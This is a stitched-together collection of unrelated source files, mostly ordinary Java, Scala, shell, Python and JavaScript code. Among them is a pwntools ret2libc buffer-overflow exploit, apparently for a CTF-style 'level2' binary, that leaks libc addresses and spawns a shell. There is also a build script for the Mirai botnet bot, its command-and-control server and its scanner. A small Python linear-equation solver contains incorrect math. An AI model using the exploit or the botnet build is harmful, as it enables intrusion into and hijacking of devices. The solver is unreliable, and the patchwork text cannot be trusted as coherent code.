IllegalArgumentException("Invalid maxAgeInSeconds: " + retention.getTime().getMaxAgeInSeconds()); } } } /** * Apply retention policies given the urn and aspect name asynchronously * * @param urn Urn of the entity * @param aspectName Name of the aspect * @param context Additional context that could be used to apply retention */ public void applyRetentionAsync(@Nonnull Urn urn, @Nonnull String aspectName, Optional<RetentionContext> context) { CompletableFuture.runAsync(() -> applyRetention(urn, aspectName, context)); } /** * Apply retention policies given the urn and aspect name * * @param urn Urn of the entity * @param aspectName Name of the aspect * @param context Additional context that could be used to apply retention */ public void applyRetention(@Nonnull Urn urn, @Nonnull String aspectName, Optional<RetentionContext> context) { Retention retentionPolicy = getRetention(urn.getEntityType(), aspectName); if (retentionPolicy.data().isEmpty()) { return; } applyRetention(urn, aspectName, retentionPolicy, context); } /** * Apply retention policies given the urn and aspect name and policies * @param urn Urn of the entity * @param aspectName Name of the aspect * @param retentionPolicy Retention policies to apply * @param retentionContext Additional context that could be used to apply retention */ public abstract void applyRetention(@Nonnull Urn urn, @Nonnull String aspectName, Retention retentionPolicy, Optional<RetentionContext> retentionContext); /** * Batch apply retention to all records that match the input entityName and aspectName * * @param entityName Name of the entity to apply retention to. If null, applies to all entities * @param aspectName Name of the aspect to apply retention to. If null, applies to all aspects */ public abstract void batchApplyRetention(@Nullable String entityName, @Nullable String aspectName); @Value public static class RetentionContext { Optional<Long> maxVersion; } }
package rest import models.User import play.api.libs.json.{JsValue, JsError, Json, Writes} import play.api.mvc.{Action, AnyContent, BodyParsers, Controller, RequestHeader} import services.UserService /** * REST API for the User Class. */ object Users extends Controller { private case class HateoasUser(user: User, url: String) private def mkHateoasUser(user: User)(implicit request: RequestHeader): HateoasUser = { val url = routes.Users.user(user.name).absoluteURL() HateoasUser(user, url) } private implicit val hateoasUserWrites = new Writes[HateoasUser] { def writes(huser: HateoasUser): JsValue = Json.obj( "user" -> Json.obj( "id" -> huser.user.id, "name" -> huser.user.name ), "links" -> Json.arr( Json.obj( "rel" -> "self", "href" -> huser.url, "method" -> "GET" ), Json.obj( "rel" -> "remove", "href" -> huser.url, "method" -> "DELETE" ) ) ) } /** * Get all users. * {{{ * curl --include http://localhost:9000/api/users * }}} * @return all users in a JSON representation. */ def users: Action[AnyContent] = Action { implicit request => val users = UserService.registeredUsers Ok(Json.obj( "users" -> Json.toJson(users.map { user => Json.toJson(mkHateoasUser(user)) }), "links" -> Json.arr( Json.obj( "rel" -> "self", "href" -> routes.Users.users.absoluteURL(), "method" -> "GET" ), Json.obj( "rel" -> "create", "href" -> routes.Users.addUser.absoluteURL(), "method" -> "POST" ) ) ) ) } /** * Gets a user by id. * Use for example * {{{ * curl --include http://localhost:9000/api/user/1 * }}} * @param name user name * @return user info in a JSON representation. */ def user(name: String): Action[AnyContent] = Action { implicit request => UserService.registeredUsers.find { _.name == name }.headOption.map { user => Ok(Json.toJson(mkHateoasUser(user))) }.getOrElse(NotFound) } private case class Username(name: String) private implicit val usernameReads = Json.reads[Username] /** * Create a new user by a POST request including the user name as JSON content. * Use for example * {{{ * curl --include --request POST --header "Content-type: application/json" * --data '{"name" : "WieAuchImmer"}' http://localhost:9000/api/user * }}} * @return info about the new user in a JSON representation */ def addUser: Action[JsValue] = Action(BodyParsers.parse.json) { implicit request => val username = request.body.validate[Username] username.fold( errors => { BadRequest(Json.obj("status" -> "OK", "message" -> JsError.toFlatJson(errors))) }, username => { Ok(Json.obj("status" -> "OK", "user" -> Json.toJson(mkHateoasUser(UserService.addUser(username.name, username.name, 5, false, true))))) // Noch ändern wenn gebraucht } ) } /** * Delete a user by id using a DELETE request. * {{{ * curl --include --request DELETE http://localhost:9000/api/user/1 * }}} * @param id the user id. * @return success info or NotFound */ def rmUser(id: Long): Action[AnyContent] = Action { implicit request => val success = UserService.rmUser(id) if (success) Ok(Json.obj("status" -> "OK")) else NotFound } }
import java.util.Scanner; public class Calculation { public static void main(String[] args) { Scanner scanner = new Scanner(System.in); System.out.print("Enter a series of numbers separated by spaces (e.g 1 2 3 4 5): "); String[] numbersString = scanner.nextLine().trim().split("\\s+"); int[] numbers = new int[numbersString.length]; for (int i = 0; i < numbersString.length; i++) { numbers[i] = Integer.parseInt(numbersString[i]); } int sum = 0; double average = 0.0; int max = Integer.MIN_VALUE; int min = Integer.MAX_VALUE; for (int number : numbers) { sum += number; max = Math.max(max, number); min = Math.min(min, number); } average = sum * 1.0 / numbers.length; System.out.println("The sum is " + sum + " the average is " + average + " the maximum is " + max + " and the minimum is " + min); } }
#!/usr/bin/env python from pwn import * libc = ELF('libc.so') elf = ELF('level2') #p = process('./level2') p = remote('127.0.0.1', 10003) plt_write = elf.symbols['write'] print 'plt_write= ' + hex(plt_write) got_write = elf.got['write'] print 'got_write= ' + hex(got_write) vulfun_addr = 0x08048404 print 'vulfun= ' + hex(vulfun_addr) payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4) print "\n###sending payload1 ...###" p.send(payload1) print "\n###receving write() addr...###" write_addr = u32(p.recv(4)) print 'write_addr=' + hex(write_addr) print "\n###calculating system() addr and \"/bin/sh\" addr...###" system_addr = write_addr - (libc.symbols['write'] - libc.symbols['system']) print 'system_addr= ' + hex(system_addr) binsh_addr = write_addr - (libc.symbols['write'] - next(libc.search('/bin/sh'))) print 'binsh_addr= ' + hex(binsh_addr) payload2 = 'a'*140 + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr) print "\n###sending payload2 ...###" p.send(payload2) p.interactive()
<filename>src/backend/db/migrations/20190102174432_add_version.js exports.up = async (knex) => { await knex.schema.table('points', table => table.integer('year')); await knex('points').update('year', 2018); }; exports.down = knex => knex.schema.table('points', table => table.dropColumn('year'));
#!/bin/sh set -e set -u set -o pipefail function on_error { echo "$(realpath -mq "${0}"):$1: error: Unexpected failure" } trap 'on_error $LINENO' ERR if [ -z ${FRAMEWORKS_FOLDER_PATH+x} ]; then # If FRAMEWORKS_FOLDER_PATH is not set, then there's nowhere for us to copy # frameworks to, so exit 0 (signalling the script phase was successful). exit 0 fi echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}" mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}" COCOAPODS_PARALLEL_CODE_SIGN="${COCOAPODS_PARALLEL_CODE_SIGN:-false}" SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}" # Used as a return value for each invocation of `strip_invalid_archs` function. STRIP_BINARY_RETVAL=0 # This protects against multiple targets copying the same framework dependency at the same time. The solution # was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????") # Copies and strips a vendored framework install_framework() { if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then local source="${BUILT_PRODUCTS_DIR}/$1" elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")" elif [ -r "$1" ]; then local source="$1" fi local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}" if [ -L "${source}" ]; then echo "Symlinked..." source="$(readlink "${source}")" fi # Use filter instead of exclude so missing patterns don't throw errors. echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\"" rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}" local basename basename="$(basename -s .framework "$1")" binary="${destination}/${basename}.framework/${basename}" if ! [ -r "$binary" ]; then binary="${destination}/${basename}" elif [ -L "${binary}" ]; then echo "Destination binary is symlinked..." dirname="$(dirname "${binary}")" binary="${dirname}/$(readlink "${binary}")" fi # Strip invalid architectures so "fat" simulator / device frameworks work on device if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then strip_invalid_archs "$binary" fi # Resign the code if required by the build settings to avoid unstable apps code_sign_if_enabled "${destination}/$(basename "$1")" # Embed linked Swift runtime libraries. No longer necessary as of Xcode 7. if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then local swift_runtime_libs swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u) for lib in $swift_runtime_libs; do echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\"" rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}" code_sign_if_enabled "${destination}/${lib}" done fi } # Copies and strips a vendored dSYM install_dsym() { local source="$1" if [ -r "$source" ]; then # Copy the dSYM into a the targets temp dir. echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${DERIVED_FILES_DIR}\"" rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${DERIVED_FILES_DIR}" local basename basename="$(basename -s .framework.dSYM "$source")" binary="${DERIVED_FILES_DIR}/${basename}.framework.dSYM/Contents/Resources/DWARF/${basename}" # Strip invalid architectures so "fat" simulator / device frameworks work on device if [[ "$(file "$binary")" == *"Mach-O dSYM companion"* ]]; then strip_invalid_archs "$binary" fi if [[ $STRIP_BINARY_RETVAL == 1 ]]; then # Move the stripped file into its final destination. echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${DERIVED_FILES_DIR}/${basename}.framework.dSYM\" \"${DWARF_DSYM_FOLDER_PATH}\"" rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${DERIVED_FILES_DIR}/${basename}.framework.dSYM" "${DWARF_DSYM_FOLDER_PATH}" else # The dSYM was not stripped at all, in this case touch a fake folder so the input/output paths from Xcode do not reexecute this script because the file is missing. touch "${DWARF_DSYM_FOLDER_PATH}/${basename}.framework.dSYM" fi fi } # Signs a framework with the provided identity code_sign_if_enabled() { if [ -n "${EXPANDED_CODE_SIGN_IDENTITY:-}" -a "${CODE_SIGNING_REQUIRED:-}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then # Use the current code_sign_identity echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}" local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS:-} --preserve-metadata=identifier,entitlements '$1'" if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then code_sign_cmd="$code_sign_cmd &" fi echo "$code_sign_cmd" eval "$code_sign_cmd" fi } # Strip invalid architectures strip_invalid_archs() { binary="$1" # Get architectures for current target binary binary_archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | awk '{$1=$1;print}' | rev)" # Intersect them with the architectures we are building for intersected_archs="$(echo ${ARCHS[@]} ${binary_archs[@]} | tr ' ' '\n' | sort | uniq -d)" # If there are no archs supported by this binary then warn the user if [[ -z "$intersected_archs" ]]; then echo "warning: [CP] Vendored binary '$binary' contains architectures ($binary_archs) none of which match the current build architectures ($ARCHS)." STRIP_BINARY_RETVAL=0 return fi stripped="" for arch in $binary_archs; do if ! [[ "${ARCHS}" == *"$arch"* ]]; then # Strip non-valid architectures in-place lipo -remove "$arch" -output "$binary" "$binary" stripped="$stripped $arch" fi done if [[ "$stripped" ]]; then echo "Stripped $binary of architectures:$stripped" fi STRIP_BINARY_RETVAL=1 } if [[ "$CONFIGURATION" == "Debug" ]]; then install_framework "${BUILT_PRODUCTS_DIR}/QinaggePodTest/QinaggePodTest.framework" fi if [[ "$CONFIGURATION" == "Release" ]]; then install_framework "${BUILT_PRODUCTS_DIR}/QinaggePodTest/QinaggePodTest.framework" fi if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then wait fi
#!/bin/bash for X in `find . -maxdepth 1 -type f -not -path "./thumbnails"`; do if [ ! -f "./thumbnails/${X}" ]; then echo "Generating thumbnail for ${X}..." convert -resize 400x225^ -gravity center -extent 400x225 -strip -interlace Plane -quality 85 "${X}" "./thumbnails/${X}" fi if [[ $(find ${X} -type f -size +409600c 2>/dev/null) ]]; then echo "Resizing ${X}..." convert -resize 1024 -strip -interlace Plane -quality 95 "${X}" "${X}" fi done
import {h} from 'composi' export default () => ( <header> <h1>HackerNews Minimal</h1> <h5>Made with Composi</h5> </header> )
<reponame>arka243/Twitter-Engine-Simulation name := "spray-tutorial" version := "1.0" scalaVersion := "2.11.2" resolvers += "spray repo" at "http://repo.spray.io" val sprayVersion = "1.3.1" libraryDependencies ++= Seq( "com.typesafe.akka" %% "akka-actor" % "2.3.6", "com.typesafe.akka" %% "akka-http-experimental" % "0.7", "io.spray" %% "spray-routing" % sprayVersion, "io.spray" %% "spray-client" % sprayVersion, "io.spray" %% "spray-testkit" % sprayVersion % "test", "org.json4s" %% "json4s-native" % "3.2.10", "com.typesafe.scala-logging" %% "scala-logging-slf4j" % "2.1.2", "ch.qos.logback" % "logback-classic" % "1.1.2", "org.scalatest" %% "scalatest" % "2.2.2" % "test", "org.mockito" % "mockito-all" % "1.9.5" % "test" )
""" Report Engine Tests. """ from base import Report from filtercontrols import FilterControl from django.test import TestCase from django import forms import reportengine class BasicTestReport(Report): """Test Report. set the rows an aggregate to test""" slug="test" namespace="testing" verbose_name="Basic Test Report" def __init__(self, rows=[ [1,2,3] ], labels=["col1","col2","col3"], aggregate = (('total',1),), filterform = forms.Form() ): self.rows=rows self.labels=labels self.aggregate=aggregate self.filterform=filterform def get_rows(self,filters={},order_by=None): return self.rows,self.aggregate def get_filter_form(self,request): return self.filterform class BasicReportTest(TestCase): def test_report_register(self): """ Tests registering a report, and verifies report is now accessible """ r=BasicTestReport() reportengine.register(r) assert(reportengine.get_report("testing","test") == r) found=False for rep in reportengine.all_reports(): if rep[0] == (r.namespace,r.slug): assert(rep[1] == r) found=True assert(found)
#!/bin/ksh -p # # CDDL HEADER START # # This file and its contents are supplied under the terms of the # Common Development and Distribution License ("CDDL"), version 1.0. # You may only use this file in accordance with the terms of version # 1.0 of the CDDL. # # A full copy of the text of the CDDL should have accompanied this # source. A copy of the CDDL is also available via the Internet at # http://www.illumos.org/license/CDDL. # # CDDL HEADER END # # # Copyright (c) 2019 by Tim Chase. All rights reserved. # Copyright (c) 2019 Lawrence Livermore National Security, LLC. # . $STF_SUITE/include/libtest.shlib . $STF_SUITE/tests/functional/cli_root/zpool_trim/zpool_trim.kshlib # # DESCRIPTION: # Trimming can be performed multiple times # # STRATEGY: # 1. Create a pool with a single disk. # 2. Trim the entire pool. # 3. Verify trimming is reset (status, offset, and action date). # 4. Repeat steps 2 and 3 with the existing pool. # DISK1=${DISKS%% *} log_must zpool create -f $TESTPOOL $DISK1 typeset action_date="none" for n in {1..3}; do log_must zpool trim -r 2G $TESTPOOL log_mustnot eval "trim_prog_line $TESTPOOL $DISK1 | grep complete" [[ "$(trim_progress $TESTPOOL $DISK1)" -lt "100" ]] || log_fail "Trimming progress wasn't reset" new_action_date="$(trim_prog_line $TESTPOOL $DISK1 | \ sed 's/.*ed at \(.*\)).*/\1/g')" [[ "$action_date" != "$new_action_date" ]] || log_fail "Trimming action date wasn't reset" action_date=$new_action_date while [[ "$(trim_progress $TESTPOOL $DISK1)" -lt "100" ]]; do progress="$(trim_progress $TESTPOOL $DISK1)" sleep 0.5 [[ "$progress" -le "$(trim_progress $TESTPOOL $DISK1)" ]] || log_fail "Trimming progress regressed" done log_must eval "trim_prog_line $TESTPOOL $DISK1 | grep complete" sleep 1 done log_pass "Trimming multiple times performs as expected"
#! /usr/bin/bash singularity exec python_latest.sif $@
from sigauth.middleware import SignatureCheckMiddlewareBase from sigauth.utils import RequestSigner SECRET = 'super secret' SENDER_ID = 'test sender' class SignatureRejectionMiddleware(SignatureCheckMiddlewareBase): secret = SECRET def test_signature_rejection_rejects_missing_signature(rf): request = rf.get('/') response = SignatureRejectionMiddleware().process_request(request) assert response.status_code == 401 def test_signature_rejection_rejects_invalid_signature(rf): request = rf.get('/', HTTP_X_SIGNATURE='NOT-CORRECT', CONTENT_TYPE='') response = SignatureRejectionMiddleware().process_request(request) assert response.status_code == 401 def test_signature_rejection_accepts_valid_signature(rf, settings): # in practive the signature is generated on the server making the request. # on the requesting server, it will know the shared secret signer = RequestSigner(secret=SECRET) headers = signer.get_signature_headers( url='/', body='', method='GET', content_type='' ) request = rf.get( '/', HTTP_X_SIGNATURE=headers[signer.header_name], CONTENT_TYPE='', ) response = SignatureRejectionMiddleware().process_request(request) assert response is None def test_signature_check_skipped(rf, settings): settings.URLS_EXCLUDED_FROM_SIGNATURE_CHECK = ['/'] request = rf.get('/') response = SignatureRejectionMiddleware().process_request(request) assert response is None
// // Created by <NAME> on 1/12/18. // #ifndef TMPL8_2018_01_TRIANGLE_H #define TMPL8_2018_01_TRIANGLE_H #include "precomp.h" struct TriangleVertices{ vec3 v1 = vec3(0,0,0); vec3 v2 = vec3(0,0,0); vec3 v3 = vec3(0,0,0); }; class Triangle: public Object { public: Triangle(vec3 v1, vec3 v2, vec3 v3, vec3 color, Material mat); Intersection intersects(Ray* ray); bool shadowRayIntersects(Ray ray); vec3 getColor(); void setColor(vec3 color); vec3 getNormal(); vec3 getNormal(vec3 point); TriangleVertices getVertices(); void setVertices(vec3 v1, vec3 v2, vec3 v3); Material getMaterial() { return material; }; void getRandomPoint(vec3 &rp, unsigned int seed1, unsigned int seed2); float getArea(); vec3 color; Material material; TriangleVertices vertices; vec3 normal; bool isTriangle = true; private: }; #endif //TMPL8_2018_01_TRIANGLE_H
#!/bin/bash FLAGS="" function compile_bot { echo ">> Compiling for $1" "$1-gcc" -std=c99 $3 bot/*.c -O3 -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o release/"$2" -DMIRAI_BOT_ARCH=\""$1"\" "$1-strip" release/"$2" -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr } if [ $# != 2 ]; then echo "!> Missing build type." echo "!> Usage: $0 <debug | release> <telnet | ssh>" exit fi if [ "$2" == "telnet" ]; then FLAGS="-DMIRAI_TELNET" elif [ "$2" == "ssh" ]; then FLAGS="-DMIRAI_SSH" fi if [ "$1" == "release" ]; then # rm -rf release if ! [ -d release ]; then mkdir -p release compile_bot i586 mirai.x86 "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot mips mirai.mips "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot mipsel mirai.mpsl "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot armv4l mirai.arm "$FLAGS -DKILLER_REBIND_SSH -static" # compile_bot armv5l mirai.arm5n "$FLAGS -DKILLER_REBIND_SSH" # compile_bot armv6l mirai.arm7 "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot powerpc mirai.ppc "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot sparc mirai.spc "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot m68k mirai.m68k "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot sh4 mirai.sh4 "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot i586 miraint.x86 "-static" compile_bot mips miraint.mips "-static" compile_bot mipsel miraint.mpsl "-static" compile_bot armv4l miraint.arm "-static" # compile_bot armv5l miraint.arm5n " " # compile_bot armv6l miraint.arm7 "-static" compile_bot powerpc miraint.ppc "-static" compile_bot sparc miraint.spc "-static" compile_bot m68k miraint.m68k "-static" compile_bot sh4 miraint.sh4 "-static" echo ">> Building cnc..." go build -o release/cnc cnc/*.go go build -o release/scanListen tools/scanListen.go echo ">> Build release done." fi elif [ "$1" == "debug" ]; then # rm -rf debug if ! [ -d debug ]; then mkdir -p debug i586-gcc -std=c99 bot/*.c -DDEBUG "$FLAGS" -static -g -o debug/mirai.x86.dbg mips-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.mips.dbg armv4l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm.dbg # armv6l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm7.dbg sh4-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.sh4.dbg gcc -std=c99 tools/enc.c -g -o debug/enc.dbg gcc -std=c99 tools/nogdb.c -g -o debug/nogdb.dbg gcc -std=c99 tools/badbot.c -g -o debug/badbot.dbg echo ">> Building cnc..." go build -o debug/cnc cnc/*.go go build -o debug/scanListen tools/scanListen.go echo ">> Build debug done." fi elif [ "$1" == "cnc" ]; then echo ">> Building cnc..." go build -o release/cnc cnc/*.go go build -o release/scanListen tools/scanListen.go echo ">> Build cnc done." else echo "Unknown parameter $1: $0 <debug | release>" fi
/* MIT License Copyright (c) 2021 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package kchandra423.kImages; import processing.core.PApplet; import processing.core.PImage; abstract class AbstractKImage implements KImage { private float x, y; private float angle; private boolean reflected, reversed; protected AbstractKImage(float x, float y, float angle, boolean reflected, boolean reversed) { this.x = x; this.y = y; this.angle = angle; this.reflected = reflected; this.reversed = reversed; } @Override public void resize(int w, int h) { } @Override public void scale(float stretchX, float stretchY) { } @Override public int getWidth() { return getImage().width; } @Override public int getHeight() { return getImage().height; } @Override public void translate(float delx, float dely) { x += delx; y += dely; } @Override public float getX() { return x; } @Override public float getY() { return y; } @Override public void moveTo(float x, float y) { this.x = x; this.y = y; } @Override public void setAngle(float theta) { theta %= Math.PI * 2; angle = theta; } @Override public float getAngle() { return angle; } @Override public boolean isReflected() { return reflected; } @Override public boolean isReversed() { return reversed; } @Override public void rotate(float theta) { angle += theta; angle %= Math.PI * 2; } @Override public void reflect(boolean flag) { this.reflected = flag; } @Override public void reverse(boolean flag) { this.reversed = flag; } @Override public void draw(PApplet p) { p.pushMatrix(); // float x = this.x*scaleX,y = this.y*scaleY; if (!reflected) { p.translate(x, y); p.rotate(angle); } else { p.scale(-1, 1); if (reversed) { p.translate(-x, y); p.rotate((float) (Math.PI - angle)); } else { p.rotate(-angle); p.translate(-(x + getWidth()), y); } } // p.scale(scaleX, scaleY); p.image(getImage(), 0, 0); p.popMatrix(); p.strokeWeight(20); p.point(150, 150); } @Override public abstract PImage getImage(); @Override public abstract Object clone(); }
<reponame>LarsBehrenberg/e-wallet<gh_stars>0 import React, { useState } from 'react'; import { Container, Card, TextField } from '@material-ui/core'; export default function LivePreviewExample() { const [value, setValue] = useState('Controlled'); const handleChange = (event) => { setValue(event.target.value); }; return ( <> <Card className="p-5 shadow-xxl"> <Container> <TextField className="m-3" fullWidth id="filled-multiline-flexible" label="Multiline" multiline rowsMax="4" value={value} onChange={handleChange} /> <TextField className="m-3" fullWidth id="filled-textarea" label="Multiline Placeholder" placeholder="Placeholder" multiline /> <TextField className="m-3" fullWidth id="filled-multiline-static" label="Multiline" multiline rows="4" defaultValue="Default Value" /> </Container> </Card> </> ); }
#!/bin/bash #v0.2.3 #------------------------------------------------------------------------------ # creates a package from the relative file paths specified in the .dev file #------------------------------------------------------------------------------ doCreateRelativePackage(){ cd $product_instance_dir mkdir -p $product_dir/dat/zip test $? -ne 0 && doExit 2 "Failed to create $product_instance_dir/dat/zip !" #define default vars test -z ${include_file:-} && \ include_file="$product_instance_dir/met/.$env_type.$run_unit" # relative file path is passed turn it to absolute one [[ $include_file == /* ]] || include_file=$product_instance_dir/$include_file test -f $include_file || \ doExit 3 "did not found any deployment file paths containing deploy file @ $include_file" tgt_env_type=$(echo `basename "$include_file"`|cut -d'.' -f2) timestamp=`date "+%Y%m%d_%H%M%S"` # the last token of the include_file with . token separator - thus no points in names zip_file_name=$(echo $include_file | rev | cut -d. -f 1 | rev) zip_file_name="$zip_file_name.$product_version.$tgt_env_type.$timestamp.$host_name.rel.zip" zip_file="$product_dir/$zip_file_name" ret=0 while read f ; do [[ $f == '#'* ]] && continue ; test -d "$product_instance_dir/$f" && continue ; test -f "$product_instance_dir/$f" && continue ; test -f "$product_instance_dir/$f" || doLog 'FATAL cannot find the file: "'"$product_instance_dir/$f"'" to package it' ; test -f "$product_instance_dir/$f" || doLog 'ERROR search for it in the '"$include_file"' ' ; test -f "$product_instance_dir/$f" || doLog 'INFO if you need the file add it to the list file ' ; test -f "$product_instance_dir/$f" || doLog 'INFO if you do not need the file remove it from the list file ' ; test -f "$product_instance_dir/$f" || ret=1 test -f "$product_instance_dir/$f" && break ; done < <(cat $include_file) doLog "DEBUG ret is $ret " test $ret -ne 0 && doLog "ERROR non-existend file specified in the include file: $include_file " # start: add the perl_ignore_file_pattern while read -r line ; do \ got=$(echo $line|perl -ne 'm|^\s*#\s*perl_ignore_file_pattern\s*=(.*)$|g;print $1'); \ test -z "$got" || perl_ignore_file_pattern="$got|${perl_ignore_file_pattern:-}" ; done < <(cat $include_file) # or how-to remove the last char from a string perl_ignore_file_pattern=$(echo "$perl_ignore_file_pattern"|sed 's/.$//') test -z $perl_ignore_file_pattern && perl_ignore_file_pattern='.*\.swp$|.*\.log|$.*\.swo$' # note: | grep -vP "$perl_ignore_file_pattern" | grep -vP '^\s*#' # zip MM ops -MM = --must-match # All input patterns must match at least one file and all input files found must be readable. ret=0 cat $include_file | grep -vP $perl_ignore_file_pattern | grep -vP '^\s*#' \ | perl -ne 's|\n|\000|g;print'| xargs -0 zip -MM $zip_file ret=$? ; if (( $ret != 0 )); then fatal_msg1="deleted $zip_file !!!" fatal_msg2="because of packaging errors !!!" rm -fv $zip_file doLog "FATAL $fatal_msg1" doLog "FATAL $fatal_msg2" doExit 1 "FATAL failed to create relative package" else cd $product_dir doLog "INFO created the following relative package:" doLog "INFO `stat -c \"%y %n\" $zip_file_name`" if [[ ${network_backup_dir+x} && -n $network_backup_dir ]] ; then if [ -d "$network_backup_dir" ] ; then doRunCmdAndLog "cp -v $zip_file $network_backup_dir/" doLog "INFO with the following network backup :" && \ doLog "INFO `stat -c \"%y %n\" \"$network_backup_dir/$zip_file_name\"`" else msg="skip backup as network_backup_dir is not configured" doLog "INFO $msg" fi fi fi } #eof doCreateRelativePackage
def solve_linear_equations(a, b, c): """ This function takes three parameters: a, b and c, which are the coefficients of a system of linear equations, and returns a tuple of the solution of the system. """ x = (c - b) / (a - b) y = (5 - a*x) / b return (x, y)
from tensorflow.keras.layers import Dense, Dropout from tensorflow.keras.models import Sequential model = Sequential() model.add(Dense(64, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(32, activation='sigmoid')) model.add(Dense(2, activation='softmax')) model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
import sys if len(sys.argv) > 1: print(sys.argv[1] + " World!") else: print("Hello World!")
package io.cattle.platform.lifecycle; import io.cattle.platform.core.model.Instance; import io.cattle.platform.lifecycle.util.LifecycleException; public interface AllocationLifecycleManager { void preStart(Instance instance) throws LifecycleException; void postStop(Instance instance); void postRemove(Instance instance); }
package com.digirati.taxman.rest.server.taxonomy.mapper; import com.digirati.taxman.common.rdf.RdfModelBuilder; import com.digirati.taxman.common.rdf.RdfModelException; import com.digirati.taxman.common.rdf.RdfModelFactory; import com.digirati.taxman.common.taxonomy.ConceptLabelExtractor; import com.digirati.taxman.common.taxonomy.ConceptModel; import com.digirati.taxman.common.taxonomy.ConceptRelationshipType; import com.digirati.taxman.rest.server.taxonomy.identity.ConceptIdResolver; import com.digirati.taxman.rest.server.taxonomy.storage.ConceptDataSet; import com.digirati.taxman.rest.server.taxonomy.storage.record.ConceptRecord; import com.digirati.taxman.rest.server.taxonomy.storage.record.ConceptRelationshipRecord; import org.apache.commons.lang3.StringUtils; import org.apache.jena.vocabulary.DCTerms; import org.apache.jena.vocabulary.SKOS; import javax.ws.rs.WebApplicationException; import java.net.URI; import java.util.ArrayList; import java.util.UUID; import java.util.function.BiConsumer; import 